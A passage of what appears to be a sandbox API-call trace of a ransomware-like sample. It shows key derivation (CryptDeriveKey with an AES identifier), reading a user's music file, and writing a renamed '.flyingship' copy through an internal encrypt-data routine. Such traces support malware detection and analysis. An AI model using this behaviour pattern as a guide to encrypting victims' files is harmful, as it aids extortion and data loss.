wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.234] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0181.234] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.234] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.234] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.234] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0181.234] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.234] CryptHashData (hHash=0x90ae18, pbData=0x8dec90, dwDataLen=0x19, dwFlags=0x1) returned 1 [0181.234] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.234] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.234] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.234] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.234] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0181.234] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0181.235] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0181.235] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.235] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0181.235] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.235] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.235] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.235] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.235] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.235] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.235] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0181.235] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.235] CryptDestroyHash (hHash=0x90ae18) returned 1 [0181.235] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.235] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.235] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.235] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.235] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.237] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\cem-br.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0181.237] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.237] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0181.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0181.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0181.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0181.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0181.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0181.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0181.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0181.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0181.237] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0181.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0181.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0181.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0181.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0181.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0181.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0181.238] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0181.238] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0181.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0181.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0181.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0181.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0181.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0181.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0181.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0181.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0181.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0181.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0181.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0181.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0181.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0181.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0181.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0181.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0181.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0181.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0181.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0181.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0181.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0181.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0181.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0181.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0181.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0181.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0181.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0181.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0181.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0181.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0181.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0181.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0181.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0181.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0181.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0181.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0181.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0181.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0181.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0181.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0181.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0181.240] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol")) returned 0x10 [0181.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0181.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0181.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0181.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0181.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0181.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0181.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0181.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0181.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0181.240] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.flyingship.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\cem-br.flyingship.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0181.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0181.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0181.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0181.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0181.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0181.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0181.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0181.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0181.242] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0181.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0181.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0181.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0181.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0181.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0181.250] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0181.250] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0181.250] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0181.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0181.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0181.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0181.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0181.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0181.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0181.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0181.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0181.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0181.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0181.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0181.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0181.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0181.251] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0181.251] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xef06, lpOverlapped=0x0) returned 1 [0181.254] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0181.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0181.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0181.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0181.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xef06) returned 0xbea018 [0181.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0181.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0181.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0181.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0181.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0181.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0181.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xef06) returned 0xbf8f28 [0181.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0181.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.257] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0181.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0181.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0181.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0181.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0181.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xef06) returned 0xbea018 [0181.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0181.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0181.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0181.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0181.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.258] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0181.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0181.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0181.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0181.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0181.258] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0181.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0181.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0181.258] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0181.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0181.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0181.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0181.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0181.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0181.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0181.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0181.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xef06) returned 0xbea018 [0181.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0181.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2788 [0181.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0181.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0181.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0181.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26d8 [0181.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0181.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0181.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0181.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2628 [0181.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0181.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0181.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0181.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fd0 [0181.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 